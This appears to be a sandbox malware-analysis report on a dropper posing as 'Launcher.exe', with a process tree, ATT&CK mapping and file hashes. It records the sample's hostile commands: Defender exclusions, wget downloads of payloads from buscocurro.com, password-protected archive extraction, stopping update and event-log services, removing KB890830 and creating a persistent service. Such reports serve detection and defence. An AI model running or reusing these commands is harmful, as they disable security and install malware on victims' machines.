PID 1724 wrote to memory of 2396	1724	Launcher.exe	102
PID 1724 wrote to memory of 2396	1724	Launcher.exe	102
PID 1724 wrote to memory of 400	1724	Launcher.exe	103
PID 1724 wrote to memory of 400	1724	Launcher.exe	103
PID 1724 wrote to memory of 400	1724	Launcher.exe	103
PID 1724 wrote to memory of 4588	1724	Launcher.exe	106
PID 1724 wrote to memory of 4588	1724	Launcher.exe	106
PID 1724 wrote to memory of 4588	1724	Launcher.exe	106
PID 1724 wrote to memory of 464	1724	Launcher.exe	107
PID 1724 wrote to memory of 464	1724	Launcher.exe	107
PID 1724 wrote to memory of 464	1724	Launcher.exe	107
PID 464 wrote to memory of 4920	464	3plugin13200	126
PID 464 wrote to memory of 4920	464	3plugin13200	126
PID 464 wrote to memory of 4920	464	3plugin13200	126
PID 1724 wrote to memory of 2272	1724	Launcher.exe	153
PID 1724 wrote to memory of 2272	1724	Launcher.exe	153
PID 1724 wrote to memory of 2272	1724	Launcher.exe	153
PID 2104 wrote to memory of 4996	2104	cmd.exe	160
PID 2104 wrote to memory of 4996	2104	cmd.exe	160
PID 1712 wrote to memory of 4016	1712	cmd.exe	192
PID 1712 wrote to memory of 4016	1712	cmd.exe	192
PID 2324 wrote to memory of 2452	2324	kuytqawknxye.exe	205
PID 2324 wrote to memory of 2452	2324	kuytqawknxye.exe	205
PID 2324 wrote to memory of 2452	2324	kuytqawknxye.exe	205
PID 2324 wrote to memory of 2452	2324	kuytqawknxye.exe	205
PID 2324 wrote to memory of 2452	2324	kuytqawknxye.exe	205
PID 2324 wrote to memory of 2452	2324	kuytqawknxye.exe	205
PID 2324 wrote to memory of 2452	2324	kuytqawknxye.exe	205

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2584
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4620

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4524
- C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
  "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:660
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2336
  - - C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
      "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1724
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4164
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:3644
    - - C:\Users\Admin\AppData\Roaming\services\plugin31849
        
        C:\Users\Admin\AppData\Roaming\services\plugin31849
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3576
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 616
        6⤵
        Program crash
        
        PID:3164
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1116
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4436
    - - C:\Users\Admin\AppData\Roaming\services\2plugin28438
        
        C:\Users\Admin\AppData\Roaming\services\2plugin28438
        5⤵
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2396
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2104
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:4996
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:5060
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:2296
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1864
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:4912
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:4244
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1116
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3488
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4924
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:1980
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:4624
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:4600
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:452
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:400
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4588
    - - C:\Users\Admin\AppData\Roaming\services\3plugin13200
        
        C:\Users\Admin\AppData\Roaming\services\3plugin13200
        5⤵
        Checks computer location settings
        Drops file in Windows directory
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:464
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 856
        6⤵
        Program crash
        
        PID:1596
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 904
        6⤵
        Program crash
        
        PID:1824
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 972
        6⤵
        Program crash
        
        PID:3772
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 1028
        6⤵
        Program crash
        
        PID:4372
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 1016
        6⤵
        Program crash
        
        PID:4960
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 1068
        6⤵
        Program crash
        
        PID:1780
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 1252
        6⤵
        Program crash
        
        PID:4636
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 1240
        6⤵
        Program crash
        
        PID:3644
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 1336
        6⤵
        Program crash
        
        PID:4680
      - C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4920
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 688
        7⤵
        Program crash
        
        PID:2176
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 728
        7⤵
        Program crash
        
        PID:3716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 740
        7⤵
        Program crash
        
        PID:4712
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 688
        7⤵
        Program crash
        
        PID:3576
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 940
        7⤵
        Program crash
        
        PID:3108
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 960
        7⤵
        Program crash
        
        PID:4732
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 968
        7⤵
        Program crash
        
        PID:3200
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 1052
        7⤵
        Program crash
        
        PID:4416
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 1176
        7⤵
        Program crash
        
        PID:3916
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 1396
        7⤵
        Program crash
        
        PID:2956
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 964
        6⤵
        Program crash
        
        PID:4652
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 880
        6⤵
        Program crash
        
        PID:1980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3576 -ip 3576
1⤵
PID:2972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 464 -ip 464
1⤵
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 464 -ip 464
1⤵
PID:980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 464 -ip 464
1⤵
PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 464 -ip 464
1⤵
PID:3264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 464 -ip 464
1⤵
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 464 -ip 464
1⤵
PID:2144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 464 -ip 464
1⤵
PID:2104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 464 -ip 464
1⤵
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 464 -ip 464
1⤵
PID:3724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 464 -ip 464
1⤵
PID:4932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 464 -ip 464
1⤵
PID:1116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4920 -ip 4920
1⤵
PID:436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4920 -ip 4920
1⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4920 -ip 4920
1⤵
PID:3740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4920 -ip 4920
1⤵
PID:2172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4920 -ip 4920
1⤵
PID:180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4920 -ip 4920
1⤵
PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4920 -ip 4920
1⤵
PID:3040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4920 -ip 4920
1⤵
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4920 -ip 4920
1⤵
PID:2640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4920 -ip 4920
1⤵
PID:1104

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
1⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2324
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4016
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3872
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4520
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1504
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2188
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1532
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2676
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2452
- C:\Windows\system32\dwm.exe
  dwm.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4668

C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:3488
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 436
  2⤵
  - Program crash
  PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3488 -ip 3488
1⤵
PID:2868

C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:2580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f5061c94d81fc0f88169ec4fcd54baa0

SHA1
c403f4df023ba10e5ef325112e0266ba18accd0a

SHA256
50b4b3a465330d1493952614df7c136ff49bbafd9781c6a809ec20ea9d996052

SHA512
489df1580f88587a9c2ba7ff264d25e855c8b694dba27b0d23f497776a0b78e7a9fe26d66e915fde28a59cc6ee152cdd39a6ab26a1a406b910a768e4d748d698

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysdk40gw.550.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

Filesize
12B

MD5
ff42b7426308944a894b31653153eaca

SHA1
de713bafb2e433852ff654b008b489e997479811

SHA256
f309dbdd94dfbefe78b7e098587e580de41aa03941b3346699c72c367bd4dfca

SHA512
9360d552e46cb4b8ae4ca2b741d6a465379cb6e2cf05f74f7128a8e307b7304bc107d1823731cacd2fa2fe0e615c567a8b44c6ac1b8292468ec295706a742ed2

Download Submit
C:\Users\Admin\AppData\Roaming\services\01plugins7727.rar

Filesize
2.9MB

MD5
a8ed41e070a43f585a5bdd420150b46d

SHA1
26525d416739c378f045a57086bcb243d5bb5829

SHA256
63a24f1ac4393f02d3d4e72963e8158eac4d6f9b93a18abe1d4ea25a98027182

SHA512
c89799edaa8b8cb0e4f572ae0d35fb08f85919b9cf1399d311c9f40207335e4cdd90fab47d7c81424876cbc147cec231ad9f2976f7f7a593f07e382129a00589

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins549.rar

Filesize
9.6MB

MD5
5cfa362d6d89d663bdb58ccd5333a54a

SHA1
a4753db03c5ddcc3f07eb4ce3b9f909fb9807fcd

SHA256
6f3299d60da1cee65c07ff09c0ed630eeccbf60d2b7c5a523a82b8b1f9d7242f

SHA512
55bf3494ffcdcbe1de0e798c2d5bfa8ade3fd1e68d77481eec9a0a2731569ade26d69b18cbe26a941c2459644ca21bd9e53a521ecad7b0065a45ce056c4a88db

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins2536.rar

Filesize
2.8MB

MD5
8349c8699b21140a3354eef28a73d7ae

SHA1
dedad5a5102f8d54530b212617a3144e31e4fe33

SHA256
49f5a9b2803a23d7a5fafd6d717b725f06f90d5e928976113ded3cbd1ef1388f

SHA512
746687363a395447763a87f90df079be13c84867f31aa685b4abde9d568eace12b8d8847a8987f8a15d6052bfea1bedb61d851cabf9cf50bcc215aa54ab60730

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin28438

Filesize
7.2MB

MD5
3d42a95de858de974d5dad1cbc7e87ed

SHA1
230e157d35007fbf594243e93fa2bf84982c5c46

SHA256
47a98e0d3ba207cf0afeef5d9d04c893dbe5bfb6e0c5537fa583bdb67c915010

SHA512
500072e9c94a92e23b9f24785c8218d35224422a4d2fbeb2ac273a3ef6957a93b73b8716297bdbbab8334ba5fb1700415c50d39b6be45ae9dd467dbebe9b4974

Download Submit
C:\Users\Admin\AppData\Roaming\services\3plugin13200

Filesize
429KB

MD5
233ea23b1c1587f1cf895f08ba6da10b

SHA1
e2b5131d03aa3bc56a004ba6debc6d57322e0691

SHA256
c7e20eafa32a38282616d78c43c574991d30fe2fbc876141fa76e5ff538c3b5c

SHA512
4f1d72732e8ea42665b325060b1dcbe8bd47b7fb78ba9e9be9d5da8c9be97206bce8b9fd319a95cd9514fa2ff58eb9194068bde09af4bef0e6d3435562e647a9

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

Filesize
2KB

MD5
7de0541eb96ba31067b4c58d9399693b

SHA1
a105216391bd53fa0c8f6aa23953030d0c0f9244

SHA256
934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e

SHA512
e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

Filesize
6KB

MD5
a37d6bd996505a42c3f29d0ed54b9ae7

SHA1
36759677d2e52e9b75b6a6b14f4f03b0dc1b0e79

SHA256
606f3b07ef6896fd75f51bd1ca1af4ed8075b22f9ca1cf8b1a0bf5bfc6d3074a

SHA512
8a8fa253062bac723dc7cffbff199fa78f7b6975019bfbdf11372711b58f0b8d1dbe1ff574280343abf290d99210c2feb8a691d1504a11d4bd934eaaa47fd149

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin31849

Filesize
459KB

MD5
5d5483b1ef3cfe2abaebcdaeace7da21

SHA1
6915c04741b3e4380577e497527ad15fc3108495

SHA256
ff7a3b83cf95c7c27b59c4db9de3f7b67c5d2909c4d72d46299654c108738ebd

SHA512
1ea901be644aac5649cf658510e2e4e88da26e4086d876ab3fc88bed25a4d8ab290077fe373757827c395398f0c9022c253ea7b87c71691d6fb5deab9ac24dfe

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
